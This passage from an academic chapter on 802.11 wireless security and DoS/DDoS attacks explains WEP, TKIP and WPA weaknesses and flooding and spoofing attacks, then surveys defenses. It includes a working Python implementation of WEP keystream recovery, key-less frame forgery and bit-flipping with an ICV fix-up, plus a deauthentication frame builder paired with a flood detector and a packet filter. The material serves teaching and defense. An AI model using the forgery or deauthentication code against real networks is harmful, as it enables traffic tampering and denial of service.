To avoid forgery in these handshake messages, the second, third and fourth messages carry a message integrity code (MIC). The MIC is a keyed hash (HMAC) over the EAPOL-Key frame, computed with the key confirmation key (KCK) portion of the PTK. This four-way handshake occurs whenever someone connects to a WLAN using WPA. It also occurs thereafter, whenever the AP decides to refresh the transient keys (Phifer, 2007). The passive dictionary attack follows directly from this design: the PTK depends only on the PMK, the two MAC addresses and the two nonces, and everything except the PMK is visible in the captured handshake, so an attacker can derive a candidate PMK from each dictionary word and the SSID, derive the candidate PTK, recompute the MIC of message 2 and compare it with the captured one, entirely offline.

Attack on Michael MIC

Michael MIC was introduced to prevent attacks through message modification. It uses a feature known as the TKIP countermeasure procedure, which works by disabling TKIP traffic on the AP if it receives two MIC failures within 60 seconds. After one minute, the AP comes back to life and would need all its past and current users to re-key to gain access to the network. An attacker could send corrupt packets to the AP which pass the frame CRC check but fail the MIC check; this triggers the TKIP countermeasures and effectively shuts down the AP, especially after repeated corrupt traffic.

Encryption Attacks on Known Plaintext, Double Encryption, and Message Modification

In the WEP encryption process, the message (or plaintext) is XOR-ed with the RC4 keystream generated from the IV and the shared key; for the decryption process, the encrypted text is XOR-ed with the same keystream to get the plaintext. Firstly, the known plaintext attack is done when the attacker knows two things: the cleartext and the encrypted text of a message communication. Having both the encrypted and unencrypted form of the same information allows one to XOR them and recover the keystream used for that IV (not the WEP key itself), which is enough to decrypt or forge any other frame encrypted under the same IV. Secondly, to carry out the double encryption attack, a frame must be captured and the attacker must change the frame header destination MAC address to that of the attacker's wireless client. After this subtle change, the attacker must wait for the IV to reset to one minus the original IV (of the modified frame), so that he/she can replay the captured frame into the air. When the AP sees the frame with the expected IV, it will encrypt the frame, actually being fooled into decrypting the frame instead of encrypting it. After doing the unknowing decryption process, the AP will forward the cleartext frame across the air to the forged MAC address specified by the attacker. Thirdly, to achieve the message modification attack, the attacker must capture an encrypted packet that is going to another subnet, modify a single bit, and attempt to resend it. The modification will offset the IC and the packet will be rejected. After trying a number of times, the bits that are flipped will make the IC correct again, although the packet would be malformed. In fact, because CRC-32 is linear, the attacker can compute the exact adjustment to the encrypted ICV for any chosen bit flips, so no trial and error is needed.
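The known-plaintext keystream recovery and the bit-flipping message modification just described, as an added worked example (not the chapter's code). RC4 is implemented inline so it runs with the standard library only; the WEP key, IV and frame payload are constructed test data. It goes one step beyond the text: instead of resending until the ICV happens to match, it uses the linearity of CRC-32 to compute the ICV correction directly, and it also shows that the recovered keystream lets an attacker forge a new frame under the same IV without the key.

```python
"""WEP keystream recovery from known plaintext, and bit flipping with an ICV fix-up.

Added worked example; not code from the chapter. The WEP key, IV and frame
payload are constructed test data. RC4 is implemented inline so the example
runs with the standard library only.
"""
import struct
import zlib

KEY = bytes.fromhex("0102030405")          # constructed 40-bit WEP key
IV = bytes.fromhex("a1b2c3")               # constructed 24-bit IV
PLAINTEXT = b"GET /admin HTTP/1.0\r\n"     # constructed frame payload


def rc4_keystream(key: bytes, n: int) -> bytes:
    """RC4 key scheduling followed by n bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """frame = IV || RC4(IV || key) XOR (plaintext || ICV); the key index byte is omitted."""
    ks = rc4_keystream(iv + key, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), ks)


def wep_decrypt(key: bytes, frame: bytes):
    """Return (payload, icv_ok) for a frame produced by wep_encrypt."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + key, len(body)))
    payload, tag = data[:-4], data[-4:]
    return payload, tag == icv(payload)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext attack: C XOR (P || ICV(P)) is the keystream for this IV, not the key."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def forge_with_keystream(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """Encrypt a chosen payload under the same IV without knowing the WEP key."""
    data = new_plaintext + icv(new_plaintext)
    if len(data) > len(keystream):
        raise ValueError("not enough recovered keystream for this payload")
    return iv + xor(data, keystream)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Message modification without trial and error.

    CRC-32 is affine over GF(2): crc(m XOR d) = crc(m) XOR crc(d) XOR crc(0^n).
    XORing the ciphertext with d || (crc(d) XOR crc(0^n)) therefore yields a
    frame that decrypts to m XOR d with a valid ICV, without knowing m.
    """
    body = frame[3:]
    n = len(body) - 4
    delta = delta[:n].ljust(n, b"\x00")
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))) & 0xFFFFFFFF
    mask = delta + struct.pack("<I", icv_delta)
    return frame[:3] + xor(body, mask)


def substitution(offset: int, old: bytes, new: bytes) -> bytes:
    """Delta that rewrites the bytes at `offset` from `old` to `new` (same length)."""
    return bytes(offset) + xor(old, new)


def demo():
    """Rewrite '/admin' to '/guest' inside the encrypted frame and decrypt it as the AP would."""
    frame = wep_encrypt(KEY, IV, PLAINTEXT)
    forged = flip_bits(frame, substitution(5, b"admin", b"guest"))
    return wep_decrypt(KEY, forged)


if __name__ == "__main__":
    print(demo())
```

The naive version of the attack (flipping payload bits without touching the encrypted ICV) is what the text describes as being rejected; the fix-up in flip_bits is why an attacker who learns nothing about the key can still produce frames that the AP accepts, and why a keyed MIC rather than a CRC is required.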



The attacker can do this numerous times without any logging or alerts from the AP. Once the packet passes the AP's IC check, it will reach the router. The router will observe that the packet is malformed and would send a response that contains the cleartext and associated encrypted text packet to the initial sender. This will give the attacker the ingredients to perform cleartext cryptanalysis. A solution is to encrypt the 802.11 frames within a layer 3 (network layer) wrapper such as IPsec, so that any tampering cannot go undetected.

General WLAN Security Measures

General security measures to minimize some of the mentioned flaws are listed as follows (Held, 2003; Hurton & Mugge, 2003; Issac, Jacob, & Mohammed, 2005):

1. Encrypt the network traffic. WPA with TKIP/AES options can be enabled. Upgrade the firmware on the AP to prevent the use of weak IV WEP keys.
2. Ensure mutual authentication through the IEEE 802.1x protocol. Client and AP should both authenticate to each other. Implementing IEEE 802.1x port-based authentication with a RADIUS server (with PEAP/MS-CHAPv2) would be a good choice.
3. Make the wireless network invisible by disabling identifier broadcasting. Turn off the SSID broadcast by the AP and configure the AP not to respond to probe requests with SSID "any," by setting your own SSID. Meaning, rename the wireless network and change the default name. (Note that the SSID still appears in cleartext in probe and association frames, so this only deters casual discovery.)
4. Change the default WEP key settings, if any. Change the default IP address in the AP to a different one. Change the administrator's password from the default password. If the wireless network does not have a default password, create one and use it to protect the network.
5. Enabling MAC filtering at the AP level, in the RADIUS server, or in both can tighten the security more, as there is a restriction in the use of MAC addresses (this step in itself can be defeated through MAC spoofing).
6. Positioning and shielding of the antenna can help to direct the radio waves to a limited space.
7. Enabling of accounting and logging can help to locate and trace back some mischief that could be going on in the network. Preventive measures can then be taken after the preliminary analysis of the log file. Allow regular analysis of captured log files to trace any illegal access or network activity.
8. Use intrusion detection software to monitor the network activity in real time and to raise alerts.
9. Use honey pots or fake APs in the regular network to confuse the intruder so that he/she gets hooked to that fake AP without achieving anything.
10. Turn off the network during extended periods of non-use or inactivity.
11. Use file sharing with caution. If the user does not need to share directories and files over the network, file sharing should be disabled on his/her computers.
12. Do not auto-connect to open Wi-Fi (wireless fidelity) networks.
13. Connect using a VPN as it allows connecting securely. VPNs encrypt connections at the sending and receiving ends through secure tunnels.
14. Use firewalls in between wireless and wired network segments and implement filters.
15. Generally avoid dictionary words for the pass phrase in any authentication. Also make the pass phrase more than 20 characters, especially if WPA pre-shared key security is employed.

Types of Denial of Service Attacks and Preventive Measures

DoS simply means the inability of a user, process, or system to get the service that it needs or wants. Common DoS attacks on networks include direct attacks, remote controlled attacks, reflective attacks, and attacks with worms and viruses.



DoS attacks are quite effective against wireless networks. The wireless management frames, which are transmitted in cleartext in a wireless network, inform the clients that they can connect or disconnect. The deauthentication frame will disassociate a wireless end device from an AP. Since they are sent in cleartext, they can easily be forged to force legitimate users out of the network. This can be accomplished by replaying a previous disassociation frame captured with a wireless sniffer. An attack on an 802.11b with 802.11g mixed network mode can affect the clear channel assessment (CCA) process that brings down the probability that two wireless nodes will transmit on the same frequency simultaneously. This attack can cause all nodes in range to shut down until the attacker stops injecting the malicious frame. A layer 2 countermeasure would be the only solution to this, since both attacks work below the IP layer; forged deauthentication and disassociation frames were later addressed by management frame protection (IEEE 802.11w), which authenticates these frames so that forged ones are discarded. The EAP-DoS attack involves injecting a number of EAP start frames to an AP and if the AP cannot properly process all these frames, there is the chance that it might become inoperable. Another attack against the AP involves sending malformed EAP messages. One of the recent attacks against the AP involves filling up the 8-bit EAP identifier space that allows only 255 ID tags to keep track of each client instance. If an attacker can flood the AP with a large number of client connection instances, using up this counter, a DoS attack can be achieved (Earle, 2006).

Different researchers have categorized DoS and DDoS from different perspectives. As documented in Christos and Aikaterini (2003), DoS attacks can be classified into five different categories, namely: (1) network device level attack, (2) operating system (OS) level attack, (3) application level attack, (4) data flood attack, and (5) protocol attack.

Network device level attack includes attacks that might be caused either by taking advantage of bugs or weaknesses in driver software or by trying to exhaust the hardware resources of network devices. Network level attacks may also involve compromising a series of computers and placing an application or agent on the computers. The computer then listens for commands from a central control computer. The compromise of computers can either be done manually or automatically through a worm or virus.

The OS level DoS attacks rely on the ways operating systems implement protocols. A typical example is the ping of death attack, in which Internet control message protocol (ICMP) echo requests having total data sizes greater than the maximum IP standard size are sent to the targeted victim. This attack often has the effect of crashing the victim's machine.

In application-based attacks, a machine or a service is compromised and put out of order either by taking advantage of specific bugs in network applications that are running on the target host or by using such applications to drain the resources of their victim. It is also possible that the attacker may have found points of high algorithmic complexity and exploits them in order to consume all available resources on a remote host.

In data flooding attacks, an attacker uses all network bandwidth or any other device bandwidth by sending massive quantities of data and so causing it to process extremely large amounts of data. For instance, the attacker bombards the targeted victim with normal, but meaningless packets with spoofed source addresses.

DoS attacks based on protocol features take advantage of certain standard protocol features such as IP and MAC source addresses. Typically, the attacker spoofs these features. Several types of DoS attacks have focused on domain name systems (DNSs), and many of these involve attacking the DNS cache on name servers. An attacker who owns a name server may coerce a victim name server into caching false records by querying the victim about the attacker's own site. A vulnerable victim name server would then refer to the rogue server and cache the answer (Davidowicz, 1999).

Other researchers such as Papadimitratos and Haas (2002) and Marti, Giuli, Lai, and Baker (2001) describe DoS attacks in relation to the routing layer and those at the link or MAC layer.

Attacks at the routing layer could consist of the following: (1) the attacker participates in routing and simply drops a certain number of the data packets. This causes the quality of the connections to deteriorate and has further ramifications on the performance if TCP is the transport layer protocol that is used; (2) the attacker transmits falsified routing
updates. The effects could lead to frequent route failures thereby deteriorating performance; (3) the attacker could potentially replay stale updates. This might again lead to false routes and degradation in performance; and (4) the attacker reduces the time-to-live (TTL) field in the IP header so that the packet never reaches the destination. Routing attacks are usually directed at dynamic routing protocols such as the border gateway protocol (BGP), open shortest path first (OSPF), and the enhanced interior gateway routing protocol (EIGRP). Direct DoS or DDoS attacks against routing protocols can lead to regional outages. Another form of routing attack is called route injection, which can lead to traffic redirection, prefix hijacking, and so forth. Attacks at the MAC layer are described next.

Flooding and Spoofing Attacks

A flooding attack, as the name implies, involves the generation of spurious messages to increase traffic on the network, while spoofing attacks involve the creation of packets with spoofed (i.e., forged) source IP addresses and other credentials.

In a smurf attack, an attacker sends a large amount of ICMP echo traffic, with the victim's address as the spoofed source, to a set of IP broadcast addresses, multiplying the traffic by the number of hosts responding. An ICMP flooding attack uses public sites that respond to ICMP echo request packets within an IP network to flood the victim's site. It involves flooding the buffer of the target computer with unwanted ICMP packets. The SYN flood attack is also known as the transmission control protocol (TCP) SYN attack and is based on exploiting the standard TCP three-way handshake. In this case, an attacker sends a SYN packet to initiate a connection. The victim responds with the second packet back to the (usually spoofed) source address with the SYN-ACK bits set. The attacker never responds to the reply packet. In this case, the victim's half-open connection queue would be filled up, denying new TCP connections. Another variant of this attack is called the user datagram protocol (UDP) flooding attack (Craig, 2000). This attack is based on the UDP echo and character generator services provided by most computers on a network. In a MAC spoofing attack, an attacker spoofs his/her original MAC address to the MAC address he/she wants to spoof. An attacker can learn the MAC address of the valid user by capturing wireless packets using any packet capturing software, by passively or actively observing the traffic. Web spoofing permits an attacker to observe and change all the Web traffic sent to the victim's machine and capture all data entered into the Web page forms (if any) by the victim. The attack can be done using Web plug-ins and JavaScript segments. The attack, once implemented, is started when the victim visits a malicious Web page through a Web link in a malicious e-mail message sent by the attacker. DNS spoofing is where the attacker makes a DNS entry point to another IP address than it would generally be pointing to. It works through stealth by unknowingly forcing a victim to generate a request to the attacker's server, and then spoofing the response from that server. IP spoofing is a process used to gain unauthorized access to computers, whereby the attacker sends packets to a computer with a spoofed IP address implying that the message is coming from a trusted and genuine host.

DDoS Attack

DDoS attacks usually refer to an attack by use of multiple sources that are distributed throughout the network. In this attack, an attacker installs the DDoS software on a network of computers, mostly through security compromise. This allows the attacker to remotely control the compromised computers, thereby making them handlers and agents. From a "master" device, the attacker can control the slave devices and direct the attack on a particular victim. Thousands of machines can be controlled from a single point of contact as shown in Figure 3. There are several types of DDoS attacks, but their methods are very similar in that they rely on a large group of previously compromised systems to direct a coordinated distributed flood attack against a particular target.

Figure 3. DDoS attack scenario using agents/zombies to flood the victim

  Attacker
    |  control traffic to handlers
  Handler        Handler        Handler
    |  control traffic to agents/zombies
  Agent   Agent   Agent   Agent   Agent   Agent
    |  flooding traffic to victim computer
  Victim

Christos and Aikaterini (2003) classified DDoS based on the degree of the attack automation. These classifications are manual, semi-automatic and automatic DDoS attacks. The manual attack involves manual scanning of remote machines for
vulnerabilities, then the attacker breaks into any one of them to install attack code. Semi-automatic attacks are partially manual and partially automatic. In this case, the attacker scans and compromises handlers and agents by using automated scripts. He/she then types the victim's address manually and the onset of the attack is specified by the handler machines. In automatic DDoS attacks the communication between attacker and agent machines is completely avoided. In most cases the attack phase is limited to a single command through the attack code file. All the features of the attack, for example the attack type, the duration, and the victim's address, are preprogrammed in the attack code. This way, the possibility of revealing the attacker's identity or source is very minimal. A number of DDoS tools that are available from the Internet have been identified by Internet Security Systems (ISS) (www.iss.net).

Defense Mechanisms Against DoS Attacks

Several techniques to counter DoS and DDoS attacks have been proposed by researchers, and we briefly discuss some of these techniques. A challenge based mechanism was proposed by Kandula, Katabi, Jacob, and Berger (2005). For example, an image-based challenge may be used to determine whether the client is a real human being or an automated script. A similar approach based on capabilities was proposed in Agarwal, Dawson, and Tryfonas (2003), and the method generally relies on clients having to ask the server for permission to send packets. If the server decides to allow the connection, it replies with a capability token, which the client includes in subsequent packets and which the network polices.

Greenhalgh, Handley, and Huici (2005) described an approach that consisted of diverting traffic going to protected servers so that it traverses control points. These control points would encapsulate the traffic, sending it to a decapsulator near the server. The server could then tell which control point a malicious flow had traversed, and request it be shut down at this boundary. Signature-based and anomaly based detection techniques are proposed in Park and Lee (2001) and Shields (2002). Some solutions involve the use of strong digital signature based transport level authentication mechanisms, as in the TLS protocol specified by Dierks and Allen (2006).
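As an added example on the detection side (not code from the chapter), assuming an offline list of timestamped 802.11 management frames such as a monitor-mode capture would provide: it builds the unprotected deauthentication frame used in the wireless DoS attack described earlier in this section, parses the management header including the Protected Frame bit, and flags a BSSID whose deauthentication/disassociation rate exceeds a threshold inside a sliding window. MAC addresses, reason codes, timestamps, the threshold and the window are constructed or assumed values.

```python
"""802.11 deauthentication frames: build, parse and flag a deauthentication flood.

Added worked example; not code from the chapter. MAC addresses, timestamps and
the frame sequence below are constructed. Frames are built as raw bytes so the
detector can be exercised offline, without radio access.
"""
import struct
from collections import defaultdict, deque
from typing import Dict, List, Set, Tuple

MGMT_HDR = "<HH6s6s6sH"          # frame control, duration, addr1, addr2, addr3, sequence control
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12
REASON_CLASS3_FROM_NONASSOC = 7  # reason code commonly seen in forged deauthentications

AP_BSSID = bytes.fromhex("001122aabbcc")        # constructed
CLIENT = bytes.fromhex("00aabbccddee")          # constructed
BROADCAST = b"\xff" * 6


def build_deauth(dst: bytes, src: bytes, bssid: bytes,
                 reason: int = REASON_CLASS3_FROM_NONASSOC, seq: int = 0) -> bytes:
    """Unprotected deauthentication frame: type 0 / subtype 12, body = 2-byte reason code."""
    frame_control = SUBTYPE_DEAUTH << 4      # protocol version 0, type 0 (management) in the low bits
    header = struct.pack(MGMT_HDR, frame_control, 0x013A, dst, src, bssid, (seq & 0xFFF) << 4)
    return header + struct.pack("<H", reason)


def parse_mgmt(frame: bytes) -> Dict[str, object]:
    """Decode the 24-byte management header; the Protected Frame bit marks 802.11w-protected frames."""
    fc, _duration, a1, a2, a3, seq_ctl = struct.unpack_from(MGMT_HDR, frame, 0)
    info: Dict[str, object] = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "protected": bool(fc & 0x4000),
        "dst": a1, "src": a2, "bssid": a3,
        "seq": seq_ctl >> 4,
    }
    if (info["type"] == 0 and info["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH)
            and not info["protected"]):
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def detect_deauth_flood(events: List[Tuple[float, bytes]], window: float = 1.0,
                        threshold: int = 10) -> Set[bytes]:
    """Flag BSSIDs emitting >= threshold unprotected deauth/disassoc frames within `window` seconds."""
    recent: Dict[bytes, deque] = defaultdict(deque)
    flagged: Set[bytes] = set()
    for ts, frame in sorted(events, key=lambda e: e[0]):
        info = parse_mgmt(frame)
        if info["type"] != 0 or info["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue
        if info["protected"]:
            continue  # 802.11w-protected frames carry a MIC and are not trivially forgeable
        q = recent[info["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            flagged.add(info["bssid"])
    return flagged


def sample_events() -> List[Tuple[float, bytes]]:
    """Constructed capture: one benign deauth, then a spoofed 40-frame broadcast burst at 50 frames/s."""
    events = [(0.0, build_deauth(CLIENT, AP_BSSID, AP_BSSID, reason=3, seq=1))]
    events += [(5.0 + i * 0.02, build_deauth(BROADCAST, AP_BSSID, AP_BSSID, seq=i)) for i in range(40)]
    return events


def demo() -> Set[bytes]:
    return detect_deauth_flood(sample_events())


if __name__ == "__main__":
    print("flooded BSSIDs:", [b.hex(":") for b in demo()])
```

A detector of this kind only alerts; the frames are accepted by clients regardless, so on networks where the equipment supports it, enabling management frame protection (IEEE 802.11w) is the preventive control, and the detector then serves to spot clients and APs that are still negotiating unprotected sessions.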


Mechanisms Against Spoofing

Attackers launching spoofing usually hide the identity of the machines they used to carry out an attack by falsifying the source address of the network communication. This makes it more difficult to identify the sources of attack traffic. It is therefore important to use network switches that have MAC binding features that store the first MAC address that appears on a port and do not allow this mapping to be altered without authentication. To prevent IP spoofing, disable source routing on all internal routers and use ingress filtering. Web spoofing depends mainly upon social engineering tricks and it is thus important to educate users and to be generally aware of the address window in a browser that displays the Web address that they are directed to. That can help if some suspicious Web site address comes up. DNS spoofing can be prevented by securing the DNS servers and by implementing anti-IP address spoofing measures (Paul, Ben, & Steven, 2003). Some vendors have added access control lists (ACL), implemented through MAC address filtering, to increase security. MAC address filtering amounts to allowing predetermined clients with specific MAC addresses to authenticate and associate. While the addition of MAC address filtering increases security, it is not a perfect solution given that MAC addresses can be spoofed. Also, the process of manually maintaining a list of all MAC addresses can be time consuming and error prone. Therefore MAC address filtering is probably best left for only small and fairly static networks (Mohammed & Issac, 2005).

Filtering Techniques

Filtering requires being able to filter the flood packets. This can be achieved with a signature-based packet filter. If one can create signatures for typical flood packets (TCP packets with zero data size for example, or unusually large ICMP packets) and filter out those packets, one can then filter the flood packets while allowing "normal" traffic to proceed. Such signatures must be chosen with care, since a legitimate TCP SYN also carries no data.

Another filtering option is to reject the first IP packet from any IP address. This works with many current generations of attack tools because they tend to use a flat distribution random number generator to generate spoofed source addresses, and they only use each random address once. Another possibility is to divert traffic based on IP protocol to different servers or even route it differently. Thus, for a Web server it might be possible to route ICMP and UDP traffic bound for the Web server somewhere else entirely, or even block it at the router, so that only TCP-based floods will succeed. This at least narrows the scope of attacks that can be made.

Another filtering technique is called ingress filtering. This filtering prevents spoofed attacks from entering the network by putting rules on point-of-entry routers that restrict source addresses to a known valid range.

Filtering can also be based on channel control. This method is known as channel control filtering and can be achieved by filtering out DDoS control messages; this prevents the attacker from causing the attack servers to begin the attack. This can also be accomplished using a signature-based packet filter. If we can develop signatures for most control channel packets, we can simply reject them at the control channel packet filter, and they will disappear from the network.
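The filtering rules described above (ingress filtering of the source range, first-packet rejection and signature-based drops), as an added worked example that is not the chapter's code, applied to a constructed packet trace of decoded packet summaries rather than raw packets. One refinement is assumed: first-packet rejection is applied only to TCP SYNs, because a real client retransmits its SYN while a one-shot ICMP or UDP datagram would simply be lost. Addresses (RFC 5737 documentation ranges), ports, sizes and thresholds are constructed values.

```python
"""Edge packet filtering against floods and spoofing over a constructed trace.

Added worked example; not code from the chapter. Addresses, ports and packet
sizes are constructed. The trace is a list of decoded packet summaries rather
than raw packets so the decision logic can run offline.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Sequence


@dataclass
class Packet:
    src: str
    dst: str
    proto: str            # "tcp", "udp" or "icmp"
    dport: int = 0
    flags: str = ""       # TCP flags as letters, e.g. "S" (SYN), "SA", "A"
    length: int = 0       # payload bytes


class EdgeFilter:
    """Ingress filtering, first-packet drop, and signature rules for flood traffic."""

    def __init__(self, valid_sources: Sequence[str], max_icmp_payload: int = 1024,
                 first_packet_drop: bool = True) -> None:
        # Source prefixes that may legitimately enter through this point (ingress filtering).
        self.valid = [ipaddress.ip_network(p) for p in valid_sources]
        self.max_icmp_payload = max_icmp_payload
        self.first_packet_drop = first_packet_drop
        self.seen = set()                      # sources that have already sent one SYN
        self.amplifier_ports = {7, 19}         # UDP echo and chargen, abused by echo/chargen floods

    def decide(self, pkt: Packet) -> str:
        src = ipaddress.ip_address(pkt.src)
        if not any(src in net for net in self.valid):
            return "drop:ingress"              # source outside the valid range: spoofed or misrouted
        if pkt.proto == "icmp" and pkt.length > self.max_icmp_payload:
            return "drop:signature-large-icmp"  # oversized echo requests (ping of death style)
        if pkt.proto == "udp" and pkt.dport in self.amplifier_ports:
            return "drop:signature-udp-amplifier"
        if self.first_packet_drop and pkt.proto == "tcp" and pkt.flags == "S":
            # Real clients retransmit the SYN; random-source flood tools use each address once.
            if pkt.src not in self.seen:
                self.seen.add(pkt.src)
                return "drop:first-packet"
        return "accept"


def filter_trace(packets: Sequence[Packet], valid_sources: Sequence[str]) -> List[str]:
    """Run one EdgeFilter over a trace and return the decision for each packet in order."""
    filt = EdgeFilter(valid_sources)
    return [filt.decide(p) for p in packets]


SAMPLE_TRACE = [  # constructed
    Packet("203.0.113.9", "192.0.2.10", "tcp", 80, "S"),         # spoofed: not in the customer range
    Packet("192.0.2.5", "192.0.2.10", "tcp", 80, "S"),           # legitimate client, first SYN
    Packet("192.0.2.5", "192.0.2.10", "tcp", 80, "S"),           # its retransmission
    Packet("192.0.2.5", "192.0.2.10", "tcp", 80, "A", 512),      # established traffic
    Packet("192.0.2.6", "192.0.2.10", "icmp", 0, "", 65000),     # oversized echo request
    Packet("192.0.2.6", "192.0.2.10", "udp", 19),                # chargen flood
    Packet("192.0.2.6", "192.0.2.10", "udp", 53, "", 60),        # ordinary DNS query
]


def demo() -> List[str]:
    return filter_trace(SAMPLE_TRACE, ["192.0.2.0/24"])


if __name__ == "__main__":
    for pkt, verdict in zip(SAMPLE_TRACE, demo()):
        print(f"{pkt.src:>14} {pkt.proto:>4} {pkt.dport:>5} {pkt.flags:>2} -> {verdict}")
```

The ingress rule is the one that scales: it needs no per-flow state and stops spoofed sources at the point of entry, whereas first-packet rejection costs one round trip for every new legitimate client and the signature rules only catch the flood shapes they were written for.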



Future Trends

Due to the rapid changes in threat level and attacking techniques, existing defense mechanisms may not be adequate to counter the threats of future attacks. Therefore, it is important for researchers to continue analyzing different threats as they emerge and develop more effective and efficient defense mechanisms. For instance, detecting distributed and automated attacks still remains a challenge. Due to the drawbacks of some of the existing solutions or defense mechanisms as well as the emergence of new attack tools, further study is needed to combine well-known security drawbacks with defense techniques that are already mature and very effective. Moreover, it is also important to look into the development of a DoS management framework for protecting, detecting, and reacting to attacks when they occur. The following summarizes expected future trends in DoS and DDoS attacks: attacks on emerging technologies; attacks against anti-DoS infrastructure; attacks with the aid of malware, adware, or spyware; recursive DNS attacks or the use of DNS servers for DoS attacks; and attacks against OpenEdge WebSpeed platforms, and so forth.

Conclusion

This chapter explores some of the security vulnerabilities associated with 802.11 wireless networks. Here basic issues with WEP and better protocols like TKIP and CCMP were discussed with some advice on security precautions. Later emphasis was given to DoS and DDoS attacks to show how complicated and varied they are in nature. DoS attacks are done quite effectively against wired and wireless networks and they cost much in terms of the damage done. Defense mechanisms against such attacks are still not perfect and the chapter eventually reviews and explains some sets of defense mechanisms that could help against such attacks.

References

Agarwal, S., Dawson, T., & Tryfonas, C. (2003). DDoS mitigation via regional cleaning centers (Tech. Rep. No. RR04-ATL-013177). Sprint ATL Research Report.

Blunk, L., & Vollbrecht, J. (1998). PPP extensible authentication protocol (EAP) (RFC 2284). Retrieved December 25, 2006, from http://www.ietf.org/rfc/rfc2284.txt

Cable, G. (2004). Wi-Fi protected access data encryption and integrity. Retrieved December 17, 2006, from http://www.microsoft.com/technet/community/columns/cableguy/cg1104.mspx

Cam-Winget, N., Housley, R., Wagner, D., & Walker, J. (2003). Security flaws in 802.11 data link protocols. Communications of the ACM, 46(5), 35-39.

Christos, D., & Aikaterini, K. (2003). DoS attacks and defense mechanisms: Classifications and state-of-the-art. Computer Networks, 44, 643-666.

Craig, A. H. (2000). The latest in denial of service attacks: Smurfing description and information to minimize effects. Retrieved May 17, 2006, from http://www.pentics.net/denial-of-service/white-papers/smurf.cgi

Davidowicz, D. (1999). Domain name system (DNS) security. Retrieved June 23, 2006, from http://compsec101.antibozo.net/papers/dnssec/dnssec.html

Dierks, T., & Allen, C. (2006). The TLS protocol (RFC 2246). Retrieved December 7, 2006, from http://www.ietf.org/rfc/rfc2246.txt

Dworkin, M. (2004). Recommendation for block cipher modes of operation: The CCM mode for authentication and confidentiality (NIST SP 800-38C). Retrieved November 17, 2006, from http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf

Earle, A. E. (2006). Wireless security handbook. Auerbach Publications, Taylor & Francis Group.

Fluhrer, S., Mantin, I., & Shamir, A. (2001). Weaknesses in the key scheduling algorithm of RC4. Retrieved July 25, 2005, from http://downloads.securityfocus.com/library/rc4_ksaproc.pdf

Fontana, J. (2007). Network World. Retrieved April 5, 2007, from http://www.networkworld.com/news/2007/011907-microsoft-secure-vpn-tunneling-protocol.html

Gast, M. (2002). 802.11 wireless networks: The definitive guide. CA: O'Reilly Media.

Greenhalgh, A., Handley, M., & Huici, F. (2005). Using routing and tunneling to combat DoS attacks. In Proceedings of the 2005 Workshop on Steps to Reducing Unwanted Traffic on the Internet.

Held, G. (2003). Securing wireless LANs. Sussex, England: John Wiley & Sons.

Hurton, M., & Mugge, C. (2003). Hack notes: Network security portable reference. CA: McGraw-Hill/Osborne.

In-Stat. (2006). In-Stat market survey. Retrieved May 11, 2007, from http://www.in-stat.com



Issac, B., Jacob, S. M., & Mohammed, L. A. (2005). The art of war driving: A Malaysian case study. In Proceedings of the IEEE International Conference on Networks (ICON) (pp. 124-129).

Kandula, S., Katabi, D., Jacob, M., & Berger, A. (2005). Botz-4-sale: Surviving organized DDoS attacks that mimic flash crowds. In Proceedings of the 2nd Symposium on Networked Systems Design and Implementation.

Lynn, M., & Baird, R. (2002). Advanced 802.11 attack, Black Hat 2002. Retrieved June 19, 2006, from http://www.blackhat.com/html/bh-usa-02/bh-usa-02-speakers.html#baird

Marti, S., Giuli, T., Lai, K., & Baker, M. (2001). Mitigating routing misbehavior in mobile ad hoc networks. In Proceedings of Mobicom, Rome.

Mohammed, L. A., & Issac, B. (2005). DoS attacks and defense mechanisms in wireless networks. In Proceedings of the IEE Mobility Conference (Mobility 2005), Guangzhou, China (pp. P2-1A).

Papadimitratos, P., & Haas, Z. J. (2002). Secure routing for mobile ad hoc networks. In Proceedings of the SCS Communication Networks and Distributed Systems Modeling and Simulation Conference (CNDS 2002), San Antonio, TX.

Park, K., & Lee, H. (2001). On the effectiveness of route-based packet filtering for distributed DoS attack prevention in power-law Internets. In Proceedings of the ACM SIGCOMM '01 Conference on Applications, Technologies, Architectures, and Protocols for Computer Communications (pp. 15-26). New York: ACM Press.

Paul, C., Ben, C., & Steven, B. (2003). Security+ guide to network security fundamentals. Thomson Course Technology (pp. 47-84).

Perrig, A., Canetti, R., Tygar, J. D., & Song, D. (2000). Efficient authentication and signing of multicast streams over lossy channels. In Proceedings of the IEEE Symposium on Security and Privacy (pp. 90-100).

Phifer, L. (2007). WPA PSK crackers: Loose lips sink ships. Retrieved April 2, 2007, from http://www.wi-fiplanet.com/tutorials/article.php/3667586

Richard, W. (2005). Voice over wireless LAN adoption triples by 2007. Retrieved January 05, 2007, from http://www.infonetics.com/resources/purple.shtml?upna05.wl.nr.shtm

